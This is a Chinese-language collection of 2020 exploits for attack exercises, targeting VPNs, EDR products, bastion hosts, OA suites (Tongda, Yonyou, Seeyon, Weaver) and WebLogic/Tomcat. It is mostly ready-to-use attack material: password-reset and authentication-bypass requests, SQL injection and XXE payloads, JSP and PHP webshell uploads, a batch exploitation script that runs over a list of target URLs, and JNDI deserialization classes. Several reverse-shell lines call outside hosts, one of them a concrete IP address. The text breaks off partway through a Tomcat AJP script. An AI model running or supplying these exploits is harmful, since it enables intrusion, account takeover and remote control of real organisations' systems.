2020HW漏洞合集

持续整理中…

一、安全设备

1、深信服 SSL VPN Nday - Pre Auth 修改绑定手机

描述：
某VPN加密算法使用了默认的key,攻击者构利用key构造重置密码数据包从而修改任意用户的密码
M7.6.6R1版本key为20181118
M7.6.1key为20100720

利用条件：需要登录账号

#计算RC4_STR_LEN脚本
from Crypto.Cipher import ARC4
from binascii import  a2b_hex

def myRC4(data,key):
    rc41 = ARC4.new(key)
    encrypted = rc41.encrypt(data)
    return encrypted.encode('hex')

def rc4_decrpt_hex(data,key):
    rc41 = ARC4.new(key)
    return rc41.decrypt(a2b_hex(data))

key = '20100720'
data = r',username=TARGET_USERNAME,ip=127.0.0.1,grpid=1,pripsw=suiyi,newpsw=TARGET_PASSWORD,'
print(myRC4(data,key))

POST https://<PATH>/por/changepwd.csp HTTP/1.1
Content-Type: application/x-www-form-urlencoded
...
sessReq=clusterd&sessid=0&str=RC4_STR&len=RC4_STR_LEN(脚本计算后结果)

参考：https://www.yuque.com/docs/share/ad8192ca-39ec-4950-86e9-01dfa989bf6f?#（密码：gf34）

2、深信服 SSL VPN Nday - Pre Auth 任意密码重置

描述：修改手机号接口未正确鉴权导致越权覆盖任意用户的手机号码

利用条件：需要登录账号

POST https://<PATH>/por/changetelnum.csp?apiversion=1
Content-Type: application/x-www-form-urlencoded
...
newtel=TARGET_PHONE&sessReq=clusterd&username=TARGET_USERNAME&grpid=0&sid=0&ip=127.0.0.1

参考：https://www.yuque.com/docs/share/ad8192ca-39ec-4950-86e9-01dfa989bf6f?#（密码：gf34）

3、深信服SSL VPN 远程代码执行漏洞 CNVD-2020-48679

https://www.onebug.org/websafe/98922.html
https://www.cnblogs.com/potatsoSec/p/12326356.html

4、深信服 SSL VPN 任意用户添加漏洞

5、深信服 EDR3.2.21远程代码执行

EXP

POST /api/edr/sangforinter/v2/cssp/slog_client?token=eyJtZDUiOnRydWV9【访问nginx规则路径，绕过第一个检查;{"md5":true}的base64编码，绕过第二个检查】 HTTP/1.1
Host: 192.168.226.60
Connection: close 
Cache-Control: max-age=0  
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0； Win64； x64) AppleWebKit/537.36 (KHTML， like Gecko) Chrome/85.0.4183.83Safari/537.36 
Accept: text/html, application/xhtml+xml, application/xml；q=0.9, image/avif,image/webp, image/apng，*/*;q=0.8,application/sign ed-exchange；v=b3；q=0.9 
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
HTTP_Y_FORWARDED_FOR: 192.168.226.1
Content-Length: 76 
Content-Type: application/x-www-form-urlencoded
HTTP_Y_FORWARDED_FOR: 192.168.226.1

{"params":"w=123\"'1234123'\"|bash -i > /dev/tcp/167.179.118.219/8899 0>&1”}

参考：https://www.cnblogs.com/0day-li/p/13650452.html

6、深信服 EDR 任意用户登录漏洞 CNVD-2020-46552

影响版本：EDR <= v3.2.19

POC

payload：https://ip:xx/ui/login.php?user=任意用户名
https://ip:xx/ui/login.php?user=admin

7、深信服 EDR 远程命令执行漏洞

影响版本：深信服EDR 3.2.16；深信服EDR 3.2.17；深信服EDR 3.2.19

EXP

POC：
https://XXX/tool/log/c.php?strip_slashes=system&limit=whoami
https://XXX/tool/log/c.php?strip_slashes=system&host=whoami
https://XXX/tool/log/c.php?strip_slashes=system&path=whoami
https://XXX/tool/log/c.php?strip_slashes=system&row=whoami

反弹Shell:
POST /tool/log/c.php HTTP/1.1
Host: x.x.x.x
Connection: close
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.81 Safari/537.36 SE 2.X MetaSr 1.0
DNT: 1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Content-Type: application/x-www-form-urlencoded;charset=utf-8
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=b1464478cad68327229d8f46e60d0a08; _ga=GA1.4.112365795.1597799903; _gid=GA1.4.1225783590.1597799903
Content-Length: 256

strip_slashes=system&host=python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("ip",port));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

8、绿盟UTS综合威胁探针管理员任意登录/密码泄露

影响版本：UTS < V2.0R00F02SP03

POC步骤：
访问页面，随意输入用户名admin密码XXX，获取响应
将相应的stauts字段false改为true可获取admin的md5值password
利用md5作为password字段修改最初的包再去登录

参考：https://www.cnblogs.com/0day-li/p/13650550.html

9、天融信TOPApp-LB负载均衡SQL注入漏洞

POST /acc/clsf/report/datasource.php HTTP/1.1
Host:xxxx.com
Connection: close
Accept: text/javascript, text/html, application/xml, text/xml, */*
X-Prototype-Version: 1.6.0.3
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=ijqtopbcbmu8d70o5t3kmvgt57
Content-Type: application/x-www-form-urlencoded
Content-Length: 201

t=l&e=0&s=t&l=1&vid=1+union select 1,2,3,4,5,6,7,8,9,substr('a',1,1),11,12,13,14,15,16,17,18,19,20,21,22--+&gid=0&lmt=10&o=r_Speed&asc=false&p=8&lipf=&lipt=&ripf=&ript=&dscp=&proto=&lpf=&lpt=&rpf=&rpt=

10、天融信数据防泄漏系统未授权修改管理员密码

描述：

无需登录权限,由于修改密码处未校验原密码,且/?module=auth_user&action=mod_edit_pwd。接口未授权访问,造成直接修改任意用户密码。:默认superman账户uid为1。

POST /?module=auth_user&action=mod_edit_pwd http/1.1
Cookie: username=superman;

uid=1&pd=Newpasswd&mod_pwd=1&dlp_perm=1

参考：https://www.secpulse.com/archives/140809.html

其它漏洞：https://blog.csdn.net/Adminxe/article/details/108744908

11、网御星云VPN老版本漏洞

12、齐治堡垒机前台远程命令执行漏洞 CVND-2019-20835

漏洞利用：fofa_dork: ‘body=”齐治科技”‘，一般通过VPN访问，互联网不能直接访问
利用条件：无需登录：

假设10.20.10.11为黑客可控的服务器，listener/cluster_manage.php文件的内容为“<?php echo ‘OK’;>”
1、访问 http://10.20.10.11/listener/cluster_manage.php  :返回 "OK".
2、访问如下链接即可getshell，执行成功后，生成PHP一句话马（echo '<?php @eval($_REQUEST[10086]);?>'>>/var/www/shterm/resources/qrcode/lbj77.php）
https://10.20.10.10/ha_request.php?action=install&ipaddr=10.20.10.11&node_id=1${IFS}|`echo${IFS}" ZWNobyAnPD9waHAgQGV2YWwoJF9SRVFVRVNUWzEwMDg2XSk7Pz4nPj4vdmFyL3d3dy9zaHRlcm0vcmVzb3VyY2VzL3FyY29kZS9sYmo3Ny5waHAK"|base64${IFS}- d|bash`|${IFS}|echo${IFS}
3、/var/www/shterm/resources/qrcode/lbj77.php  密码10086

备注：ZWNobyAnPD9waHAgQGV2YWwoJF9SRVFVRVNUWzEwMDg2XSk7Pz4nPj4vdmFyL3d3dy9zaHRlcm0vcmVzb3VyY2VzL3FyY29kZS9sYmo3Ny5waHAK就是echo '<?php @eval($_REQUEST[10086]);?>'>>/var/www/shterm/resources/qrcode/lbj77.php的base64加密后的结果

据说还是另外一个版本是java的。
POST /shterm/listener/tui_update.php

a=["t';import os;os.popen('whoami')#"]

参考：https://www.secpulse.com/archives/140809.html

齐治堡垒机命令执行CVE-2019-17294

POST /audit/data_provider.php?ds_y=2019&ds_m=04&ds_d=02&ds_hour=09&ds_min=40&server_cond=&service=`id`&identity_cond=&query_type=all&format=json&browse=true HTTP/1.1
Host: ip
Reterer: https：//10/ /audit/browse.php?year=2019&month=04&day=02&hour=096mi|nute=40&service=tui 
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With:XMLHttpRequest
DNT:1
Connection: keep-alive

page=l&rp=30&sortname=stampl&sortorder=desc&query=&qtype=

HTTP/1.1 200 OK 
Date: Tue, 02 Apr 2019 02:00:57 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
...
Content-Type: text/x-json

("cmdline": "/usr/libexec/shterm/auditlist all sess -fjson--pagesize=3 --page=l --tl=2019-04-02 09:40:00--t2=2019-04-02019:41:00--locale=zh CN --order=-Stampl    --service=uid=48(apache) gid=48(apache) groups=48(apache) --domains 16"， "page": l， "total": 0，titles:tid"/status"，"proto，"stampi"，"stamp2"，  "from_1 paddr"， "identity_ login"，|"server_name"， Igierver_ip"， "account_remote"， "count_cmd"，  " COulint_cmd_deny"， "count_cmd_kill"， "optime"， "filesi.ze"， "reviewer"]， "rows" : [] )

13、Aruba Clearpass远程代码执行漏洞 CVE-2020-7115

https://portswigger.net/daily-swig/critical-aruba-clearpass-rce-vulnerability-exposes-underlying-systems

14、PAN-OS远程代码执行漏洞 CVE-2020-2040

15、联软准入文件上传漏洞

POST /uai/download/uploadfileToPath.htm HTTP/1.1
HOST: xxxxx
... ...
 
-----------------------------570xxxxxxxxx6025274xxxxxxxx1
Content-Disposition: form-data; name="input_localfile"; filename="xxx.jsp"
Content-Type: image/png
 
<%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%><%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%><%if (request.getMethod().equals("POST")){String k="e45e329feb5d925b";/*该密钥为连接密码32位md5值的前16位，默认连接密码rebeyond*/session.putValue("u",k);Cipher c=Cipher.getInstance("AES");c.init(2,new SecretKeySpec(k.getBytes(),"AES"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);}%>
 
-----------------------------570xxxxxxxxx6025274xxxxxxxx1
Content-Disposition: form-data; name="uploadpath"
 
../webapps/notifymsg/devreport/
-----------------------------570xxxxxxxxx6025274xxxxxxxx1--

参考：https://blog.csdn.net/m0_48520508/article/details/108790281

二、OA

1、通达OA11.6未授权远程代码执行漏洞

描述：该漏洞是由于通过删除通达OA身份认证文件达到绕过登录限制, 结合任意文件上传达到RCE的效果。
影响版本：通达OA<v11.5&v11.6版本

import requests
#by Tommy，在原作者上修改而来，2020-8-19，通达OA 0 day漏洞利用
import sys
version = sys.version_info
if version < (3, 0):
    print('The current version is not supported, you need to use python3')
    sys.exit()
     
def exploit(target):
    try:
        target=target
        payload='<?php eval($_POST["admin"]);?>'#可自行修改
        print(target,"[*]删除auth.inc.php...")
 
        url=target+"/module/appbuilder/assets/print.php?guid=../../../webroot/inc/auth.inc.php"#删除auth.inc.php请求
        requests.get(url=url,verify=False,timeout=10)
        print(target,"[*]正在检查文件是否已删除...")
        url=target+"/inc/auth.inc.php"
        page=requests.get(url=url,verify=False,timeout=10).text
        #print(page)
        if 'No input file specified.' not in page:
            print(target,"[-]无法删除auth.inc.php文件")
            return 0
        print(target,"[+]删除auth.inc.php成功")
        print(target,"[*]开始上传payload...")
        url=target+"/general/data_center/utils/upload.php?action=upload&filetype=nmsl&repkid=/.<>./.<>./.<>./"
        files = {'FILE1': ('admin1.php', payload)}
        requests.post(url=url,files=files,verify=False,timeout=10)
        url=target+"/_admin1.php"
        page=requests.get(url=url,verify=False,timeout=10).text
        if 'No input file specified.' not in page:
            print("[+]************************文件已存在，上传成功************************")
           # if '8a8127bc83b94ad01414a7a3ea4b8' in page:#如果执行过md5函数，才确认漏洞存在，减少误报
            print(target,"************************代码执行成功，存在漏洞************************")
            print(target,"[+]URL:",url)
        else:
            print(target,"[-]文件上传失败")
    except Exception as e:
        print(target,e)
urls='url.txt'
print("[*]警告：利用此漏洞，会删除auth.inc.php，这可能会损坏OA系统")
input("按Enter继续")
for url in open(urls,'r',encoding='utf-8').read().split('\n'):
    url=url.split()
    exploit(url[0])

参考：https://www.cnblogs.com/wangfuguiblog/p/13712433.html

2、通达OA11.4 越权登录漏洞

备注：4.17老漏洞

def poc(url):
    # 11.X: /general/login_code.php , /logincheck_code.php , /general/index.php?isIE=0
    # 2017: /ispirit/login_code.php ,

    headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:60.0) Gecko/20100101 Firefox/60.0'}
    checkUrl = url + '/general/login_code.php'
    try:
        res = requests.get(checkUrl)
        resText = str(res.text).split('{')
        codeUid = resText[-1].replace('}"}', '').replace('\r\n', '')
        getSessUrl = url + '/logincheck_code.php'
        res = requests.post(
            getSessUrl, data={'CODEUID': '{' + codeUid + '}', 'UID': int(1)}, headers=headers)
        print('[+]Get Available COOKIE:' + res.headers['Set-Cookie'])
        headers["Cookie"] = str(res.headers['Set-Cookie'])
        loginUrl = self.url + '/general/index.php?isIE=0'
        rsp = requests.get(loginUrl, headers=headers)
        if "管理员" in rsp.text and "admin" in rsp.text:
            print('seccuss！')
            return True
        else:
            return False
    except Exception as e:
        return False

3、通达OA11.5 多处SQL注入漏洞

POST /general/appbuilder/web/calendar/calendarlist/getcallist HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.117 Safari/537.36
Referer: https://www.0-sec.org/portal/home/
Cookie: PHPSESSID=54j5v894kbrm5sitdvv8nk4520; USER_NAME_COOKIE=admin; OA_USER_ID=admin; SID_1=c9e143ff
Connection: keep-alive
Host: www.0-sec.org
Pragma: no-cache
X-Requested-With: XMLHttpRequest
Content-Length: 154
X-WVS-ID: Acunetix-Autologin/65535
Cache-Control: no-cache
Accept: */*
Origin: https://www.0-sec.org
Accept-Language: en-US,en;q=0.9
Content-Type: application/x-www-form-urlencoded; charset=UTF-8

starttime=AND (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])---&endtime=1598918400&view=month&condition=1

GET /general/email/sentbox/get_index_data.php?asc=0&boxid=&boxname=sentbox&curnum=3&emailtype=ALLMAIL&keyword=sample%40email.tst&orderby=1&pagelimit=20&tag=&timestamp=1598069133&total= HTTP/1.1
X-Requested-With: XMLHttpRequest
Referer: https://www.0-sec.org/
Cookie: PHPSESSID=54j5v894kbrm5sitdvv8nk4520; USER_NAME_COOKIE=admin; OA_USER_ID=admin; SID_1=c9e143ff
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate
Host: www.0-sec.org
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.117 Safari/537.36
Connection: close

GET /general/email/inbox/get_index_data.php?asc=0&boxid=&boxname=inbox&curnum=0&emailtype=ALLMAIL&keyword=&orderby=3--&pagelimit=10&tag=&timestamp=1598069103&total= HTTP/1.1
X-Requested-With: XMLHttpRequest
Referer: https://www.0-sec.org
Cookie: PHPSESSID=54j5v894kbrm5sitdvv8nk4520; USER_NAME_COOKIE=admin; OA_USER_ID=admin; SID_1=c9e143ff
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate
Host: www.0-sec.org
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.117 Safari/537.36
Connection: close

GET /general/appbuilder/web/report/repdetail/edit?link_type=false&slot={}&id=2 HTTP/1.1
X-Requested-With: XMLHttpRequest
Referer: https://www.0-sec.org
Cookie: PHPSESSID=54j5v894kbrm5sitdvv8nk4520; USER_NAME_COOKIE=admin; OA_USER_ID=admin; SID_1=c9e143ff
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate
Host: www.0-sec.org
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.117 Safari/537.36
Connection: close

POST /general/file_folder/swfupload_new.php HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.117 Safari/537.36
Referer: http://192.168.202.1/
Connection: close
Host: 192.168.202.1
Content-Length: 391
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US
Content-Type: multipart/form-data; boundary=----------GFioQpMK0vv2

------------GFioQpMK0vv2
Content-Disposition: form-data; name="ATTACHMENT_ID"

1
------------GFioQpMK0vv2
Content-Disposition: form-data; name="ATTACHMENT_NAME"

1
------------GFioQpMK0vv2
Content-Disposition: form-data; name="FILE_SORT"

2
------------GFioQpMK0vv2
Content-Disposition: form-data; name="SORT_ID"

------------GFioQpMK0vv2--

会过滤掉：空格、制表符、换行符、回车符、垂直制表符等。只能报错，或尝试 and 等语句判断还是没有问题的。

POST /general/file_folder/api.php HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.117 Safari/537.36
Referer: http://192.168.202.1/general/file_folder/public_folder.php?FILE_SORT=1&SORT_ID=59
X-Resource-Type: xhr
Cookie: PHPSESSID=g1njm64pl94eietps80muet5d7; USER_NAME_COOKIE=admin; OA_USER_ID=admin; SID_1=fab32701
Connection: close
Host: 192.168.202.1
Pragma: no-cache
x-requested-with: XMLHttpRequest
Content-Length: 82
x-wvs-id: Acunetix-Deepscan/209
Cache-Control: no-cache
accept: */*
origin: http://192.168.202.1
Accept-Language: en-US
content-type: application/x-www-form-urlencoded; charset=UTF-8

CONTENT_ID_STR=222&SORT_ID=59&FILE_SORT=1&action=sign

POST /general/appbuilder/web/meeting/meetingmanagement/meetingreceipt HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.117 Safari/537.36
Referer: http://192.168.202.1/general/meeting/myapply/details.php?affair=true&id=5&nosign=true&reminding=true
X-Resource-Type: xhr
Cookie: PHPSESSID=g1njm64pl94eietps80muet5d7; USER_NAME_COOKIE=admin; OA_USER_ID=admin; SID_1=fab32701
Connection: close
Host: 192.168.202.1
Pragma: no-cache
x-requested-with: XMLHttpRequest
Content-Length: 97
x-wvs-id: Acunetix-Deepscan/186
Cache-Control: no-cache
accept: */*
origin: http://192.168.202.1
Accept-Language: en-US
content-type: application/x-www-form-urlencoded; charset=UTF-8

m_id=5&join_flag=2&remark='%3b%20exec%20master%2e%2exp_cmdshell%20'ping%20172%2e10%2e1%2e255'--

参考：零组；https://www.cnblogs.com/yuzly/p/13608532.html

4、通达OA文件包含漏洞

备注：3月份老漏洞

import requests

POC = {"P": "7789", "DEST_UID": "1", "UPLOAD_MODE": "2"}
def poc(self):
    # 上传漏洞、文件包含漏洞url
    uploadUrl = self.url + "/ispirit/im/upload.php"
    includeUrl = self.url + "/ispirit/interface/gateway.php"
    # 2017版 includeUrl = self.url + "/mac/gateway.php"
    # 这里写上传的php或其它文件内容
    files = {'ATTACHMENT': "Tongda_Vul_test"}
    # files = {'ATTACHMENT': 'echo("hello")'}
    try:
        uploadRes = requests.post(uploadUrl, data=POC, files=files)
        # 文件上传后路径
        path = uploadRes.text
        path = path[path.find('@') + 1:path.rfind('|')].replace("_", "\/").replace("|", ".")

        # json形式包含url访问本地
        includeData = {"json": "{\"url\":\"/general/../../attach/im/" + path + "\"}"}
        includeRes = requests.post(includeUrl, data=includeData)
        if "Tongda_Vul_test" in includeRes.text:
            return True
        else:
            return False
    except Exception as e:
        return False

5、用友GRP-u8 XXE&SQL注入导致命令执行

描述： 用友GRP-u8存在XXE漏洞，该漏洞源于应用程序解析XML输入时没有进制外部实体的加载，导致可加载恶意外部文件。

利用条件：无需登录

POST /Proxy HTTP/1.1
Accept: Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0;)
Host: host
Content-Length: 357
Connection: Keep-Alive
Cache-Control: no-cache

cVer=9.8.0&dp=<?xml version="1.0" encoding="GB2312"?><R9PACKET version="1"><DATAFORMAT>XML</DATAFORMAT><R9FUNCTION><NAME>AS_DataRequest</NAME><PARAMS><PARAM><NAME>ProviderName</NAME><DATA format="text">DataSetProviderData</DATA></PARAM><PARAM><NAME>Data</NAME><DATA format="text">exec xp_cmdshell 'net user'</DATA></PARAM></PARAMS></R9FUNCTION></R9PACKET>

参考：https://www.cnblogs.com/yuzly/p/13675224.html

6、用友NC6.5反序列化漏洞

explpit.java

import nc.bs.framework.common.NCLocator;

import java.util.Properties;

public class poc {

    public static void attack(String url, String jndipath) {
        Properties env = new Properties();
        if (!url.startsWith("http")) {
            url = "http://" + url;
        }
        env.put("SERVICEDISPATCH_URL", url + "/ServiceDispatcherServlet");
        NCLocator locator = NCLocator.getInstance(env);
        locator.lookup(jndipath);
    }

    public static void main(String[] args) {
        attack("http://target", "ldap://ip:port/classname");
    }
}

remote.java

import javax.naming.Context;
import javax.naming.Name;
import javax.naming.spi.ObjectFactory;
import java.io.Serializable;
import java.util.Hashtable;

public class remote implements ObjectFactory, Serializable {

    public remote() {
        try{
            java.lang.Runtime.getRuntime().exec(new String[]{"/bin/sh","-c","sh -i >& /dev/tcp/ip/port 0>&1"});
        } catch (Exception e) {
            e.printStackTrace();
        }
    }

    @Override
    public Object getObjectInstance(Object obj, Name name, Context nameCtx, Hashtable<?, ?> environment) throws Exception {
        return null;
    }
}

利用 nc 自带的类进行远程部署利用

import nc.bs.framework.common.ComponentMetaVO;
import nc.bs.framework.rmi.RemoteAddressSelector;
import nc.bs.framework.rmi.RemoteProxy;

public class remote implements RemoteProxy {

    public remote() {
        try{
            java.lang.Runtime.getRuntime().exec(new String[]{"/bin/sh","-c","sh -i >& /dev/tcp/ip/port 0>&1"});
        } catch (Exception e) {
            e.printStackTrace();
        }
    }

    @Override
    public Object getAttribute(String s) {
        return null;
    }

    @Override
    public void setAttribute(String s, Object o) {

    }

    @Override
    public ComponentMetaVO getComponentMetaVO() {
        return null;
    }

    @Override
    public int getRetryMax() {
        return 0;
    }

    @Override
    public void setRetryMax(int i) {

    }

    @Override
    public long getRetryInterval() {
        return 0;
    }

    @Override
    public void setRetryInterval(long l) {

    }

    @Override
    public void setRemoteAddressSelector(RemoteAddressSelector remoteAddressSelector) {

    }

    @Override
    public RemoteAddressSelector getRemoteAddressSelector() {
        return null;
    }
}

参考：https://blog.sari3l.com/posts/608d18f0/ https://xz.aliyun.com/t/8242?page=5

7、致远A8任意文件写入文件上传漏洞

备注：去年HW老漏洞

import requests

POC = 'DBSTEP V3.0     354             0               28             DBSTEP=OKMLlKlV\r\nOPTION=S3WYOSWLBSGr\r\ncurrentUserId=zUCTwigsziCAPLesw4gsw4oEwV66\r\nCREATEDATE=wUghPB3szB3Xwg66\r\nRECORDID=qLSGw4SXzLeGw4V3wUw3zUoXwid6\r\noriginalFileId=wV66\r\noriginalCreateDate=wUghPB3szB3Xwg66\r\nFILENAME=qfTdqfTdqfTdVaxJeAJQBRl3dExQyYOdNAlfeaxsdGhiyYlTcATdN1liN4KXwiVGzfT3brV6\r\nneedReadFile=yRWZdAS6\r\noriginalCreateDate=wLSGP4oEzLKAz4=iz=66\r\nseeyon_A8_arbitrary_upload168f3e4c470b9d72920d3dff7bfa0a0e'

def poc(self):
    vulUrl = self.url + "/seeyon/htmlofficeservlet"
    headers = {
        "Content-Type": "application/x-www-form-urlencoded",
        "User-Agent": "Mozilla/5.0+(compatible;+Baiduspider/2.0;++http://www.baidu.com/search/spider.html)"
    }
    try:
        rsp = requests.post(url=vulUrl, data=POC, verify=False, headers=headers, timeout=5)
        if 'BSTEP=OKMLlKlV' in rsp.text:
            r = requests.get(self.url + '/seeyon/test123456.txt')
            if r.status_code == 200:
                httpResponse = "HTTP Response Status:" + str(r.status_code) \
                               + "\nHTTP Response Headers:" + str(r.headers) \
                               + "\nHTTP Response Body:\n" + str(r.text)

                return True, httpResponse
            else:
                return False
    except Exception as e:
        return False

8、致远A8反序列化漏洞

9、泛微e-cology某版本存在RCE漏洞

备注：去年HW老漏洞

import requests

POC = 'bsh.script=exec("ping");&bsh.servlet.captureOutErr=true& bsh.servlet.output=raw&bsh.servlet.captureOutErr=true&bsh.servlet.output=raw'

def poc(self):
    vulUrl = self.url + "/weaver/bsh.servlet.BshServle"
    headers = {
        "User-Agent": "Mozilla/5.0+(compatible;+Baiduspider/2.0;++http://www.baidu.com/search/spider.html)"
    }
    try:
        rsp = requests.post(url=vulUrl, data=POC, verify=False, headers=headers, timeout=5)
        if rsp.status_code == 200:
            if "ping" in rsp.text and "count" in rsp.text and "timeout" in rsp.text:
                httpResponse = "HTTP Response Status:" + str(rsp.status_code) \
                               + "\nHTTP Response Headers:" + str(rsp.headers) \
                               + "\nHTTP Response Body:\n" + str(rsp.text)

                return True, httpResponse
            else:
                return False
    except Exception as e:
        return False

10、泛微云桥任意文件读取

import requests
import re

def poc(self):
    vulUrl_win = self.url + "/wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:///etc/passwd&fileExt=txt"
    vulUrl_linux = self.url + "/wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:///etc/passwd&fileExt=txt"
    headers = {
        "User-Agent": "Mozilla/5.0+(compatible;+Baiduspider/2.0;++http://www.baidu.com/search/spider.html)",
        'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3',
        'Accept-Language': 'zh-CN,zh;q=0.9',
        'Content-Type': 'application/x-www-form-urlencoded'
    }
    try:
        rsp = requests.get(url=vulUrl_win, verify=False, timeout=5)
        if rsp.status_code == 200:
            if "id" in rsp.text:
                print(rsp.text)
                match = re.finditer(r"\"id\":\"(?P<var>.+?)\"", rsp.text)
                for m in match:
                    fileId = m.group('var')
                filePath = self.url + "/file/fileNoLogin/" + fileId
                filersp = requests.get(url=filePath, verify=False, timeout=5)
                if "root:x:0:0:root:/root:/bin/bash" in filersp.text:
                    httpResponse = "HTTP Response Status:" + str(filersp.status_code) \
                                   + "\nHTTP Response Headers:" + str(filersp.headers) \
                                   + "\nHTTP Response Body:\n" + str(filersp.text)
                    print(httpResponse)
                    return True, httpResponse
                else:
                    return False
            else:
                return False
        else:
            rsp = requests.get(url=vulUrl_linux, verify=False, timeout=5)
            if "id" in rsp.text:
                print(rsp.text)
                match = re.finditer(r"\"id\":\"(?P<var>.+?)\"", rsp.text)
                for m in match:
                    fileId = m.group('var')
                filePath = self.url + "/file/fileNoLogin/" + fileId
                filersp = requests.get(url=filePath, verify=False, timeout=5)
                if "root:x" in filersp and ":0:0:root:/root:/bin/bash" in filersp.text:
                    httpResponse = "HTTP Response Status:" + str(filersp.status_code) \
                                   + "\nHTTP Response Headers:" + str(filersp.headers) \
                                   + "\nHTTP Response Body:\n" + str(filersp.text)
                    print(httpResponse)
                    return True, httpResponse
                else:
                    return False
            else:
                return False
    except Exception as e:
        return False

参考：xray

三、中间件/容器

1、Weblogic命令执行漏洞 CVE-2020-14645

参考：https://my.oschina.net/u/4582816/blog/4436485

2、Weblogic反序列化漏洞 CVE-2020-2551

参考：https://xz.aliyun.com/t/7725

3、Weblogic反序列化漏洞 CVE-2020-2555

参考：https://www.secpulse.com/archives/140207.html

4、WebSphere远程代码执行漏洞 CVE-2020-4450

参考：https://lucifaer.com/2020/08/21/WebSphere%E8%BF%9C%E7%A8%8B%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90%EF%BC%88CVE-2020-4450%EF%BC%89/

5、WebSphere远程代码执行漏洞 CVE-2020-4362

参考：https://xz.aliyun.com/t/8248?page=5

6、WebSphere 存在XXE外部实体注入漏洞 CVE-2020-4643

xml如下：
<!DOCTYPE x [
  <!ENTITY % aaa SYSTEM "file:///C:/Windows/win.ini">
  <!ENTITY % bbb SYSTEM "http://yourip:8000/xx.dtd">
  %bbb;
]>
<definitions name="HelloService" xmlns="http://schemas.xmlsoap.org/wsdl/">
  &ddd;
</definitions>

xx.dtd如下：
<!ENTITY % ccc '<!ENTITY ddd &#39;<import namespace="uri" location="http://yourip:8000/xxeLog?%aaa;"/>&#39;>'>%ccc;

参考：https://paper.seebug.org/1342/

7、Apache Tomcat文件包含漏洞 CVE-2020-1938

备注：2月漏洞

#!/usr/bin/env python
#CNVD-2020-10487  Tomcat-Ajp lfi
#by ydhcui
import struct

# Some references:
# https://tomcat.apache.org/connectors-doc/ajp/ajpv13a.html
def pack_string(s):
	if s is None:
		return struct.pack(">h", -1)
	l = len(s)
	return struct.pack(">H%dsb" % l, l, s.encode('utf8'), 0)
def unpack(stream, fmt):
	size = struct.calcsize(fmt)
	buf = stream.read(size)
	return struct.unpack(fmt, buf)
def unpack_string(stream):
	size, = unpack(stream, ">h")
	if size == -1: # null string
		return None
	res, = unpack(stream, "%ds" % size)
	stream.read(1) # \0
	return res
class NotFoundException(Exception):
	pass
class AjpBodyRequest(object):
	# server == web server, container == servlet
	SERVER_TO_CONTAINER, CONTAINER_TO_SERVER = range(2)
	MAX_REQUEST_LENGTH = 8186
	def __init__(self, data_stream, data_len, data_direction=None):
		self.data_stream = data_stream
		self.data_len = data_len
		self.data_direction = data_direction
	def serialize(self):
